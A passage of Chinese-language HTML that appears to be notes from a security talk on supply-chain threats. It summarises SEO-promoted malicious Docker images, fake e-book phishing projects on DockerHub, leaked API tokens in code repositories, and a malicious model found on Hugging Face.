攻击者利用谷歌搜索引擎的SEO机制,将恶意Docker镜像排在搜索结果前列。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 用户在搜索Android APK模拟器时,可能误点击看似合法的Docker Hub链接。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 实际下载的是伪装成正常应用的恶意软件包。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 这种攻击方式难以被普通开发者察觉,容易造成无意识的安全漏洞。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">abaflaper/truck-simulator-apk-para攻击原理解释：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 攻击者创建一个恶意Docker镜像,并使用包含常见搜索词的名称(如&#34;simulator APK&#34;)。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 将该镜像上传到Docker Hub,使其能被搜索引擎收录。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 利用SEO技术提高该Docker Hub页面在相关搜索结果中的排名。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 当用户搜索Android APK模拟器时,这个恶意镜像的链接可能出现在搜索结果的靠前位置。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 用户误以为这是合法的APK下载链接,点击后实际下载的是伪装的恶意软件包。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 恶意软件包被下载到用户本地设备后,可能对系统造成安全威胁。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">这种攻击利用了用户对搜索结果的信任,以及对Docker Hub等平台认知的不足,从而实现了恶意软件的分发。</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);"> </span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">电子书钓鱼陷阱</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">Docker</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">naiflicengroup1985/read-download-pdf-citadel-of：<span style="mso-spacerun:yes;">  </span></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 诈骗者利用 DockerHub 平台创建伪装成电子书的项目，实际上并不包含真正的 Docker 镜像。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 这些项目通过 SEO 优化在搜索结果中出现，诱导用户点击链接。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 点击后会弹出信用卡付费窗口，诱导用户付款，但实际上不会提供任何电子书内容。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 这种手法是互联网钓鱼诈骗的新变种，利用了人们对电子书下载的需求。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 文章提醒读者警惕这类新型诈骗手法，避免落入陷阱。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 作者对诈骗者的&#34;创新&#34;表示无奈，同时指出这些问题项目已被修复。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例：开源代码仓库中的敏感信息泄露问题</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 开源软件平台如GitHub、GitLab和DocHub等存在安全隐患。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 最常见的泄露信息是AWS访问token，可能由于开发者在上传代码时未删除包含敏感信息的脚本造成。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 其他常见泄露的敏感信息包括Telegram、GitHub和OpenAI的token。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 这种无意识的代码泄露成为许多企业面临的重要安全挑战。</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 开发者需要提高安全意识，在上传代码时注意检查和清理敏感信息。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">AI</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">模型</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">Hugging Face</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">暗藏攻击</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;所有的问题能够在修复以及包括的成本最低的还是在开发阶段，而不是在最终的这个运行阶段。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">1. AI和机器学习在安全领域应用广泛，但也带来新的安全隐患。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 大语言模型的部署和使用可能存在多方面风险：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>第三方执行工具可能存在CVE问题</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>模型参数可能被篡改</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>Docker镜像形式的部署增加了不确定性</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. AI模型本身可能存在安全风险，如恶意代码可能被嵌入模型中。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. Hugging Face案例警示：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>在Hugging Face上发现名为&#34;GPT-2-light&#34;的恶意模型镜像</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>该模型被下载并在本地执行时，会调用计算器，潜在地攻破本地机器</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>证明恶意代码可以被嵌入到模型中，造成安全威胁</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 从官方仓库下载的包并不一定都是安全可用的，需要提高安全防范意识。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 在生产环境中部署AI模型需要格外谨慎，因为涉及计算资源和私有数据。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 